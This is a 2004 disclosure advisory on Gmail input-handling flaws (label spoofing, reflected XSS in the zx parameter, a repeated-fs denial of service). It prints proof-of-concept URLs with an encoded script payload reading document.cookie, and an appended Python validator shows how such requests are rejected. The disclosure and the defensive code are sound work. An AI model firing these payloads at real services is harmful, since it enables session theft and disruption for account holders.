Date: Sat, 20 Nov 2004 03:37:04 +0100
From: Lostmon
Subject: Multiple vulnerabilities in gmail service (XSS, Denial of Service)

#######################################
Denial of service on Gmail account
vendor url: http://gmail.google.com/
vendor notified: yes
exploit included: yes
original advisory: http://lostmon.spymac.net/blog/
########################################

When a user has the Gmail cookie active, a specially crafted URL to the Gmail service can be created. The service has these two vulnerabilities:

1. The name of the "remove label" button can be changed and a ghost category can be created.

   http://gmail.google.com/gmail?search=cat&cat=[label_name]&view=tl&start=0&zx=18acabd2b173f0d81040559556&fs=1

2. The zx variable does not properly validate its input and can permit execution of XSS code.

   http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f0d81040559556[XSS-code]&fs=1

3. Denial of service: the number of times the fs variable appears in the URL is not counted, and ...

   http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f0d81040559556&fs=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&fs=1

   or

   http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f0d81040559556&fs=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1

nice :)

Sincerely: Lostmon

Thanks to http://www.ayuda-internet.net for their support
Thanks to Rottew and ismax
Thanks to estrella for being my light

Curiosity is what moves the mind....
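
A server-side check for the input-handling problems described above (unvalidated zx content, a repeated fs parameter that is never counted, and a label name reflected into the page), as an added example that is not part of the original advisory. Only the parameter names come from the advisory's URLs; the accepted value formats, the field cap, the function names and the host name are assumptions.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names are those in the advisory's URLs. The accepted formats
# are assumptions made for this example, not Gmail's real rules.
RULES = {
    "search": re.compile(r"[a-z]{1,16}"),
    "cat": re.compile(r"[^\x00-\x1f]{1,64}"),  # free text, escaped on output
    "view": re.compile(r"[a-z]{1,8}"),
    "start": re.compile(r"[0-9]{1,6}"),
    "zx": re.compile(r"[0-9a-f]{1,64}"),       # opaque hex token only
    "fs": re.compile(r"[01]"),                 # single flag value
}
MAX_FIELDS = 16  # assumed cap; parse_qsl raises ValueError beyond it


def validate_query(url):
    """Return the query as a dict, or raise ValueError on any anomaly."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True,
                      max_num_fields=MAX_FIELDS)
    params = {}
    for name, value in pairs:  # values are already percent-decoded
        if name not in RULES:
            raise ValueError("unknown parameter: %r" % name)
        if name in params:
            raise ValueError("repeated parameter: %r" % name)
        if not RULES[name].fullmatch(value):
            raise ValueError("malformed value for %r" % name)
        params[name] = value
    return params


def is_rejected(url):
    try:
        validate_query(url)
    except ValueError:
        return True
    return False


def render_remove_button(params):
    """Escape the label at output time so markup in cat stays inert text."""
    return "<button>Remove label %s</button>" % html.escape(params["cat"])


# Constructed sample request (host is a placeholder).
BASE = ("http://mail.example/gmail?search=cat&cat=work&view=tl"
        "&start=0&zx=18acabd2b173f0d81040559556")
```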